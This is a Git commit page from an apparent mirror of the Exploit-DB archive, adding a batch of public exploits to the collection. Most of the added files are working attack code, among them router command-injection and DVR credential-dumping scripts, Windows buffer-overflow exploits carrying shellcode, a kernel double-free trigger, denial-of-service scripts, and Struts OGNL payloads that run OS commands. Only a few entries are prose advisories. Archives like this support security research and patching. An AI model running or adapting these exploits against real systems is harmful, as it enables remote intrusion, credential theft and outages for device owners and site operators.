bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2018-05-04

Browse source 
20 changes to exploits/shellcodes

Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow

Jnes 1.0.2 - Stack Buffer Overflow

Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow

netek 0.8.2 - Denial of Service

Cisco Smart Install - Crash (PoC)
Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service
Linux Kernel  < 4.17-rc1 - 'AF_LLC' Double Free

Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1)
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1)
Adobe Reader PDF - Client Side Request Injection
Windows - Local Privilege Escalation

Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)

Adobe Flash < 28.0.0.161 - Use-After-Free
Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC)
GPON Routers - Authentication Bypass / Command Injection
TBK DVR4104 / DVR4216 - Credentials Leak
Call of Duty Modern Warefare 2 - Buffer Overflow

Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion
Squirrelcart 1.x - 'cart.php' Remote File Inclusion

Infinity 2.x.x - options[style_dir] Local File Disclosure
Infinity 2.x - 'options[style_dir]' Local File Disclosure

PHP-Nuke 8.x.x - Blind SQL Injection
PHP-Nuke 8.x - Blind SQL Injection

WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure
WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure

WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure
WHMCompleteSolution (WHMCS) 3.x - 'clientarea.php' Local File Disclosure

Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities
Ajax Availability Calendar 3.x - Multiple Vulnerabilities

vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection
vBulletin vBSEO 4.x - 'visitormessage.php' Remote Code Injection

WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting
WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting

Subrion 3.X.x - Multiple Vulnerabilities
Subrion 3.x - Multiple Vulnerabilities

Ciuis CRM 1.0.7 - SQL Injection

LifeSize ClearSea 3.1.4 - Directory Traversal

WordPress Plugin Activity Log 2.4.0 - Cross-Site Scripting
DLINK DCS-5020L - Remote Code Execution (PoC)
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
This commit is contained in:
Offensive Security 2018-05-04 05:01:47 +00:00
parent be89b7c04a
commit 813a3efbb5
21 changed files with 1341 additions and 11 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

41
exploits/hardware/dos/44451.py Executable file
View file

@ -0,0 +1,41 @@
# smi_ibc_init_discovery_BoF.py
import socket
import struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args()
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v
def send_packet(sock, packet):
sock.send(packet)
def receive(sock):
return sock.recv()
if __name__ == "__main__":
print "[*] Connecting to Smart Install Client ", options.target, "port", options.port
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.connect((options.target, options.port))
payload = 'BBBB' * 44 shellcode = 'D' * 2048
data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
tlv_1 = craft_tlv(0x00000001, data) tlv_2 = shellcode
hdr = '\x00\x00\x00\x01' # msg_from
hdr += '\x00\x00\x00\x01' # version
hdr += '\x00\x00\x00\x07' # msg_hdr_type
hdr += struct.pack('>I', len(data)) # data_length
pkt = hdr + tlv_1 + tlv_2
print "[*] Send a malicious packet"
send_packet(con, pkt)

35
exploits/hardware/remote/44574.txt Normal file
View file

@ -0,0 +1,35 @@
# PoC command injection in BLE service of Norton Core Secure WiFi Router (CVE-2018-5234)
For more information read
[paper](https://embedi.com/blog/whos-watching-the-watchers-vol-ii-norton-core-secure-wifi-router).
To demonstrate the exploitation, we will use:
- OS GNU/Linux;
- Bluetooth dongle adapter;
- BlueZ utility (for testing Bluetooth connection).
In order to use the script, we will need to set all dependencies in a advance:
```shell
$ pip install -r ./requirements.txt
```
With the help of `BlueZ` utilities, we should ensure Bluetooth is enabled and
functions properly.
1. Restart the router to provide access to the engineering page.
2. Start the PoC on behalf of the root user (required for operating with
Bluetooth) with the command on executing as an argument:
```shell
$ ./ble_norton_core.py "/etc/init.d/dropbear start"
```
After the script is successfully executed, we get access to the device via
the SSH connection. We put `root` as a user and `admin` as password:
```shell
$ ssh root@norton.core
```
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44574.zip

9
exploits/hardware/remote/44576.sh Executable file
View file

@ -0,0 +1,9 @@
#!/bin/bash
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the ouput…."
curl -k $1/diag.html?images/ 2>/dev/null | grep diag_result = | sed -e s/\\n/\n/g

120
exploits/hardware/remote/44577.py Executable file
View file

@ -0,0 +1,120 @@
# -*- coding: utf-8 -*-
import json
import requests
import argparse
import tableprint as tp
class Colors:
BLUE = '\033[94m'
GREEN = '\033[32m'
RED = '\033[0;31m'
DEFAULT = '\033[0m'
ORANGE = '\033[33m'
WHITE = '\033[97m'
BOLD = '\033[1m'
BR_COLOUR = '\033[1;37;40m'
banner = '''
__..--.._
..... .--~ ..... `.
.": "`-.. . .' ..-'" :". `
` `._ ` _.'`"( `-"'`._ ' _.' '
~~~ `. ~~~
.'
/
(
^---'
[*] @capitan_alfa
'''
details = '''
# Exploit Title: DVRs; Credentials Exposed
# Date: 09/04/2018
# Exploit Author: Fernandez Ezequiel ( @capitan_alfa )
'''
parser = argparse.ArgumentParser(prog='getDVR_Credentials.py',
description=' [+] Obtaining Exposed credentials',
epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81',
version="1.1")
parser.add_argument('--host', dest="HOST", help='Host', required=True)
parser.add_argument('--port', dest="PORT", help='Port', default=80)
args = parser.parse_args()
HST = args.HOST
port = args.PORT
headers = {}
fullHost_1 = "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list"
host = "http://"+HST+":"+str(port)+"/"
print Colors.GREEN+banner+Colors.DEFAULT
def makeReqHeaders(xCookie):
headers["Host"] = host
headers["User-Agent"] = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)"
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
headers["Accept-Languag"] = "es-AR,en-US;q=0.7,en;q=0.3"
headers["Connection"] = "close"
headers["Content-Type"] = "text/html"
headers["Cookie"] = "uid="+xCookie
return headers
try:
rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000)
except Exception,e:
print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT
exit()
badJson = rX.text
try:
dataJson = json.loads(badJson)
totUsr = len(dataJson["list"]) #--> 10
except Exception, e:
print " [+] Error: "+str(e)
print " [>] json: "+str(rX)
# print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin"))
exit()
print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN
print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT
print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT
print " "
final_data = []
try:
for obj in range(0,totUsr):
temp = []
_usuario = dataJson["list"][obj]["uid"]
_password = dataJson["list"][obj]["pwd"]
_role = dataJson["list"][obj]["role"]
temp.append(_usuario)
temp.append(_password)
temp.append(_role)
final_data.append(temp)
hdUsr = Colors.GREEN + "Username" + Colors.DEFAULT
hdPass = Colors.GREEN + "Password" + Colors.DEFAULT
hdRole = Colors.GREEN + "Role ID" + Colors.DEFAULT
cabeceras = [hdUsr, hdPass, hdRole]
tp.table(final_data, cabeceras, width=20)
except Exception, e:
print "\n [!]: "+str(e)
print " [+] "+ str(dataJson)
print "\n"

11
exploits/hardware/webapps/44580.txt Normal file
View file

@ -0,0 +1,11 @@
“The DCS-5020L Wireless N Day & Night Pan/Tilt Cloud Camera is a day/night network camera that easily connects to your existing home network for remote viewing on a range of mobile devices. It features pan, tilt and digital zoom function to allow you to see a wider area with a single camera, built-in Wi-Fi extender to effortlessly expand your wireless coverage, night vision up to 5 metres, sound and motion detection for the ultimate in peace of mind, and H.264 video compression for a high-quality image.”
This walkthrough demonstrates just how easy it can be to find vulnerabilities in Internet of Things (IOT) devices. The process of finding the following command injection can be broken down into 3 steps that are more akin to a 100 point CTF challenge: download binary, run strings, trace input to system call to origin.
An attacker can escape the sed command with a simple payload, such as `touch a`. Another example that fits is AdminID=a`telnetd`, which allows a user to login as “a”, which becomes the new root account:
Source: https://www.fidusinfosec.com/dlink-dcs-5030l-remote-code-execution-cve-2017-17020/

26
exploits/linux/dos/44190.py Executable file
View file

@ -0,0 +1,26 @@
#Exploit Title : netek 0.8.2 FTP Denial of Service
#Test on : windowsXPs3 + windows 7
#software Link :https://sourceforge.net/projects/netek.berlios/
#version : 0.8.2
#author : Lawrence Amer
#site : lawrenceamer.me
#affected product uses default port 30817 , it can be chnaged also
#!/bin/python
import socket
ip = raw_input("[+] IP to attack: ")
sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,30817)))
print "[+] Connection %d" % i
crash1 = "\x41"*5000 +"\X42"*1000
sarr[i].send(crash1+'\r\n')
i+=1
except socket.error:
print "[*] Server crashed with CPU 100!!"
raw_input()
break

52
exploits/linux/dos/44579.c Normal file
View file

@ -0,0 +1,52 @@
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/socket.h>
struct sockaddr_llc {
short sllc_family;
short sllc_arphrd;
unsigned char sllc_test;
unsigned char sllc_xid;
unsigned char sllc_ua;
unsigned char sllc_sap;
unsigned char sllc_mac[6];
unsigned char __pad[2];
};
void test()
{
int fd = socket(AF_LLC, SOCK_STREAM, 0);
char output[32] = "lo";
socklen_t len;
setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10);
struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2};
bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc));
struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2};
connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc));
char msg[0x10] = "aaaa";
send(fd, msg, 0x10, 0);
}
int main()
{
test();
return 0;
}

3
exploits/linux/local/25444.c
View file

@ -6,6 +6,9 @@
* update may 2013:
* seems like centos 2.6.32 backported the perf bug, lol.
* jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
*
* EDB Note: Update ~ http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
* ~ https://github.com/realtalk/cve-2013-2094/blob/master/rewritten_semtex.c
*/
#define _GNU_SOURCE 1

84
exploits/multiple/remote/44412.py Executable file
View file

File diff suppressed because one or more lines are too long

164
exploits/multiple/webapps/44583.txt Normal file
View file

@ -0,0 +1,164 @@
CVE Number: CVE-2013-2251
Title: Struts2 Prefixed Parameters OGNL Injection Vulnerability
Affected Software: Apache Struts v2.0.0 - 2.3.15
Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
Issue Status: v2.3.15.1 was released which fixes this vulnerability
Issue ID by Vender: S2-016
Overview:
Struts2 is an open-source web application framework for Java.
Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which
leads to arbitrary Java method execution on the target server. This is
caused by insecure handling of prefixed special parameters (action:,
redirect: and redirectAction:) in DefaultActionMapper class of Struts2.
Details:
<About DefaultActionMapper>
Struts2's ActionMapper is a mechanism for mapping between incoming HTTP
request and action to be executed on the server. DefaultActionMapper is
a default implementation of ActionMapper. It handles four types of
prefixed parameters: action:, redirect:, redirectAction: and method:.
For example, redirect prefix is used for HTTP redirect.
Normal redirect prefix usage in JSP:
<s:form action="foo">
...
<s:submit value="Register"/>
<s:submit name="redirect:http://www.google.com/" value="Cancel"/>
</s:form>
If the cancel button is clicked, redirection is performed.
Request URI for redirection:
/foo.action?redirect:http://www.google.com/
Resopnse Header:
HTTP/1.1 302 Found
Location: http://www.google.com/
Usage of other prefixed parameters is similar to redirect.
See Struts2 document for details.
https://cwiki.apache.org/confluence/display/WW/ActionMapper
<How the Attack Works>
As stated already, there are four types of prefixed parameters.
action:, redirect:, redirectAction:, method:
All except for method: can be used for attacks. But regarding action:,
it can be used only if wildcard mapping is enabled in configuration.
On the one hand, redirect: and redirectAction: are not constrained by
configuration (thus they are convenient for attackers).
One thing that should be noted is that prefixed parameters are quite
forceful. It means that behavior of application which is not intended
to accept prefixed parameters can also be overwritten by prefixed
parameters added to HTTP request. Therefore all Struts2 applications
that use DefaultActionMapper are vulnerable to the attack.
The injection point is name of prefixed parameters.
Example of attack using redirect: is shown below.
Attack URI:
/bar.action?redirect:http://www.google.com/%25{1000-1}
Response Header:
HTTP/1.1 302 Found
Location: http://www.google.com/999
As you can see, expression (1000-1) is evaluated and the result (999)
is appeared in Location response header. As I shall explain later,
more complex attacks such as OS command execution is possible too.
In DefaultActionMapper, name of prefixed parameter is once stored as
ActionMapping object and is later executed as OGNL expression.
Rough method call flow in execution phase is as the following.
org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()
org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()
org.apache.struts2.dispatcher.Dispatcher.serviceAction()
org.apache.struts2.dispatcher.StrutsResultSupport.execute()
org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()
com.opensymphony.xwork2.util.TextParseUtil.translateVariables()
com.opensymphony.xwork2.util.OgnlTextParser.evaluate()
Proof of Concept:
<PoC URLs>
PoC is already disclosed on vender's web page.
https://struts.apache.org/release/2.3.x/docs/s2-016.html
Below PoC URLs are just quotes from the vender's page.
Simple Expression:
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
OS Command Execution:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
Obviously such attacks are not specific to blank/showcase application,
but all Struts2 based applications may be subject to attacks.
<OS Command Execution and Static Method Call>
Another topic that I think worth mentioning is that PoC URLs use
ProcessBuilder class to execute OS commands. The merit of using this
class is that it does not require static method to execute OS commands,
while Runtime class does require it.
As you may know, static method call in OGNL is basically prohibited.
But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by
a simple trick:
%{#_memberAccess['allowStaticMethodAccess']=true,
@java.lang.Runtime@getRuntime().exec('your commands')}
In Struts v2.3.14.2, SecurityMemberAccess class has been changed to
prevent the trick. However there are still some techniques to call
static method in OGNL.
One technique is to use reflection to replace static method call to
instance method call. Another technique is to overwrite #_memberAccess
object itself rather than property of the object:
%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),
@java.lang.Runtime@getRuntime().exec('your commands')}
Probably prevention against static method is just an additional layer
of defense, but I think that global objects such as #_memberAccess
should be protected from rogue update.
Timeline:
2013/06/24 Reported to Struts Security ML
2013/07/17 Vender announced v2.3.15.1
2013/08/10 Disclosure of this advisory
Recommendation:
Immediate upgrade to the latest version is strongly recommended as
active attacks have already been observed. It should be noted that
redirect: and redirectAction: parameters were completely dropped and
do not work in the latest version as stated in the vender's page.
Thus attention for compatibility issues is required for upgrade.
If you cannot upgrade your Struts2 immediately, filtering (by custom
servlet filter, IPS, WAF and so on) can be a mitigation solution for
this vulnerability. Some points about filtering solution are listed
below.
- Both %{expr} and ${expr} notation can be used for attacks.
- Parameters both in querystring and in request body can be used.
- redirect: and redirectAction: can be used not only for Java method
execution but also for open redirect.
See S2-017 (CVE-2013-2248) for open redirect issue.
https://struts.apache.org/release/2.3.x/docs/s2-017.html
Reference:
https://struts.apache.org/release/2.3.x/docs/s2-016.html
https://cwiki.apache.org/confluence/display/WW/ActionMapper

48
exploits/php/webapps/43347.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: [Ciuis CRM v 1.0.7 Sql Injection]
# Google Dork: [if applicable]
# Date: [12/15/2017]
# Exploit Author: [Zahid Abbasi]
# Contact: http://twitter.com/zahidsec
# Website: http://zahidabbasi.com
# Vendor Homepage: [http://ciuis.com/]
# Software Link: [https://codecanyon.net/item/ciuis-crm/20473489]
# Version: [1.0.7] (REQUIRED)
# Tested on: [Win 7 64-bit]
# CVE : [if applicable]
1. Description
The injection required user registration on CIUS CRM. Old versions have
not been tested but it's a guess, they are also vulnerable.
The URL path filename appears to be vulnerable to SQL injection attacks.
The payload 65079277 or 7647=07647 was submitted in the URL path
filename, and a database error message was returned.
You should review the contents of the error message, and the
application's handling of other input, to confirm whether a
vulnerability is present.
2. Proof of Concept
The live testing was done on demo site of the script.
https://ciuis.com/demo/accounts/account/4 [URL path filename]
Request:-
GET /demo/accounts/account/465079277%20or%207647%3d07647 HTTP/1.1
Host: ciuis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=98b5ef21cb2d123fb376f135218129226808fbec
Connection: close
Upgrade-Insecure-Requests: 1
Response:-
After placing our injection code and forwarding the request. The html
response is posted below.
<div id="container">
<h1>A Database Error Occurred</h1>
<p>Error Number: 1064</p><p>You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the
right syntax to use near 'and `transactiontype` =0)' at line
3</p><p>SELECT SUM(`amount`) AS `amount`
--

45
exploits/php/webapps/44409.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title : Activity Log Wordpress Plugin Stored Cross Site Scripting (XSS)
# Date: 25-02-2018
# Exploit Author : Stefan Broeder
# Contact : https://twitter.com/stefanbroeder
# Vendor Homepage: https://pojo.me
# Software Link: https://wordpress.org/plugins/aryo-activity-log/
# Version: 2.4.0
# CVE : CVE-2018-8729
# Category : webapps
Description
===========
Activity Log is a WordPress plugin which tracks site activity. It has more than 70.000 active installations. Version 2.4.0 (and possibly the previous ones) are affected by several Stored XSS vulnerabilities.
Vulnerable part of code
=======================
Storing the payload:
File: aryo-activity-log/hooks/class-aal-hook-attachment.php:14. The log entry that is stored contains the result of get_the_title($post->ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-comments.php:14. The log entry that is stored contains the result of get_the_title($comment->comment_post_ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-posts.php:7. The log entry that is stored contains the result of $title = get_the_title($post), which can include HTML and is not sanitized by WordPress.
Displaying the payload:
File: aryo-activity-log/classes/class-aal-activity-log-list-table.php:209. $item->object_name is displayed without sanitization and can contain HTML tags.
Impact
======
Arbitrary JavaScript code can be run on browser side if a user is able to create a post or upload an attachment.
Exploitation
============
To successfully exploit this vulnerability, an attacker would have to perform any of the following:
- Create/edit/draft/publish/trash/untrash a post with JavaScript in the title
- Create/edit/trash/untrash/mark_as_spam/unmark_as_spam a comment on a post with JavaScript in the title
- Add/edit/delete an attachment with JavaScript in the attachment title
Regular website visitors will not have the capability to do any of these, however, possible threat actors might include:
- A user with the role of ‘editor’ within WordPress (non-admins which are able to create content)
- A rogue administrator among multiple administrators
- A compromised plugin
If the payload has been injected, then it will be executed once the Activity Log is viewed. This can possibly lead to stealing of CSRF nonces and creation of new (administrator) users on the WordPress instance.
Solution
========
Update to 2.4.1

41
exploits/windows/dos/43116.py Executable file
View file

@ -0,0 +1,41 @@
#!/usr/bin/env python
# coding: utf-8
# Exploit Title: Jnes Version 1.0.2 Stack Buffer Overflow
# Date: 3-11-2017
# Exploit Author: crash_manucoot
# Contact: twitter.com/crash_manucoot
# Vendor Homepage: http://www.jabosoft.com/home
# Software Link: http://www.jabosoft.com/categories/3
# Version: v1.0.2.15
# Tested on: Windows 7 Home Premium SP1 SPANISH
# Category: Windows Local Exploit
# How to use: open the emulator load any ROM go to options - cheats - add - Pro-Action Replay
# paste the contents of the open.txt in the box <address>-<value> click on ok
# you will get an error message click on ok close the cheat menu and bum
import struct
fuzzing = open('open.txt','w+')
eip = struct.pack('<I', 0x75744E2B) # (overwrites EIP with the address of user32.dll)
buffer = "A" * 812
nops = "\x90" * 20 #Nops
shellcode = ( #cmd.exe Shellcode
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x40\x1c\x8b\x04\x08"
"\x8b\x04\x08\x8b\x58\x08\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01"
"\xda\x8b\x72\x20\x01\xde\x41\xad\x01\xd8\x81\x38\x47\x65\x74"
"\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08"
"\x64\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x01\xde\x66\x8b\x0c"
"\x4e\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd6\x31\xc9"
"\x51\x68\x45\x78\x65\x63\x68\x41\x57\x69\x6e\x89\xe1\x8d\x49"
"\x01\x51\x53\xff\xd6\x87\xfa\x89\xc7\x31\xc9\x51\x68\x72\x65"
"\x61\x64\x68\x69\x74\x54\x68\x68\x41\x41\x45\x78\x89\xe1\x8d"
"\x49\x02\x51\x53\xff\xd6\x89\xc6\x31\xc9\x51\x68\x65\x78\x65"
"\x20\x68\x63\x6d\x64\x2e\x89\xe1\x6a\x01\x51\xff\xd7\x31\xc9"
"\x51\xff\xd6")
fuzzing.write(buffer + eip + nops + shellcode)

77
exploits/windows/dos/43208.py Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow (Free and Professional variants)
# Date: 01/12/2017
# Exploit Author: Jason Magic (ret2eax)
# Vendor Homepage: www.socusoft.com
# Version: 8.0.0
# Tested on: Windows Server 2008 R2
# Socusoft's Photo 2 Video Converter v8.0.0 (Free and Professional variants)
# contains a local buffer overflow condition in the pdmlog.dll library.
# Exploitation can result in register rewrites to control program execution
# flow, therefore, resulting in the ability to execute arbitrary shellcode leading
# to complete system compromise.
# Import generated .reg prior to restarting the executable within a debugger
# The following PUSH ESP, RETN instruction sequence addresses are suitable to
# redirect program execution:
# DVDPhotoData.dll:
# 0x10002352 push esp; ret
# 0x10013945 push esp; retn 0x0004
# 0x1004cb83 push esp; retn 0x0008
# 0x1004cbb8 push esp; retn 0x0008
# 0x1004cc11 push esp; retn 0x0008
# BEGIN EXPLOIT POC
#!/usr/bin/python
# REGISTERS (POC)
# EAX 42424242
# ECX 0002BF3B pdmlog.<ModuleEntryPoint>
# EDX 00020000 pdmlog.00020000
# EBX 00020000 pdmlog.00020000
# ESP 035BFB90
# EBP 035BFBAC
# ESI 00000002
# EDI 00000000
# EIP 42424242
# EAX 10013945 DVDPhoto.10013945
# ECX 0002BF3B pdmlog.<ModuleEntryPoint>
# EDX 00020000 pdmlog.00020000
# EBX 00020000 pdmlog.00020000
# ESP 03A0FB90
# EBP 03A0FBAC
# ESI 00000002
# EDI 00000000
# EIP 10013945 DVDPhoto.10013945 <- EIP Overwrite '\x45\x39\x01\x10'
# outfile
file = "proof-of-concept.reg"
# register re-write
padding = "\x41" * 548
eipOffset = "\x45\x39\x01\x10" # PUSH ESP (0x10013945)
stackRewrite = "\x43" * 400 # Shellcode Space
# generate exploit file containing above payload instructing EIP overwrite
poc = "Windows Registry Editor Version 5.00\n\n"
poc = poc + "[HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General]\n"
poc = poc + "\"TempFolder\"=\"" + padding + eipOffset + stackRewrite + "\""
try:
print "[*] Generating exploit contents...\n";
print "[*] Creating payload file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] Success!";
except:
print "[!] ERROR!";
#EOF

56
exploits/windows/dos/44273.py Executable file
View file

@ -0,0 +1,56 @@
###############################################################################
# Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date: 06-03-2018
# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj
# Organization : TwinTech Solutions
# Vulnerable Software: Allok Video Converter
# Vendor Homepage: http://www.alloksoft.com
# Version: 4.6.1217
# Software Link: http://www.alloksoft.com/allok_vconverter.exe
# Tested On: Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerbility
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ...
#1. Download and install the "setup(allok_vconverter.exe)" file
#2. Run this exploit code via python 2.7
#3. A file "exploit.txt" will be created
#4. Copy the contents of the file and paste in the License Name field
# Name > exploit.txt
#5. Type some random character in License Code
#6. Click Register and voila !
#7. Boom calculator opens
#
##############################################################################
import struct
file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()

15
exploits/windows/dos/44572.txt Normal file
View file

@ -0,0 +1,15 @@
What do you need to know? Tenable Research has discovered a critical remote code execution vulnerability in Schneider Electrics InduSoft Web Studio and InTouch Machine Edition.
What's the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system.
What's the business impact? A malicious threat actor can completely compromise and gain control of the system, and use it as a pivot point to execute lateral transfer.
What's the solution? Schneider Electric has released InduSoft Web Studio v8.1 SP1 and InTouch Machine Edition 2017 v8.1 SP1 to address this vulnerability. Affected users should apply the patches ASAP.
The following is a proof of concept:
cat <(echo -ne '\x02\x57\x03\x02\x32'`python -c 'print "A"*0x500'`'\x09\x0a\x03') - | nc <target_host> 1234
More information: https://www.tenable.com/blog/tenable-research-advisory-critical-schneider-electric-indusoft-web-studio-and-intouch-machine

48
exploits/windows/local/44573.txt Normal file
View file

@ -0,0 +1,48 @@
% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012
% modified by InsertScript
%PDF-1. % can be truncated to %PDF-\0
1 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
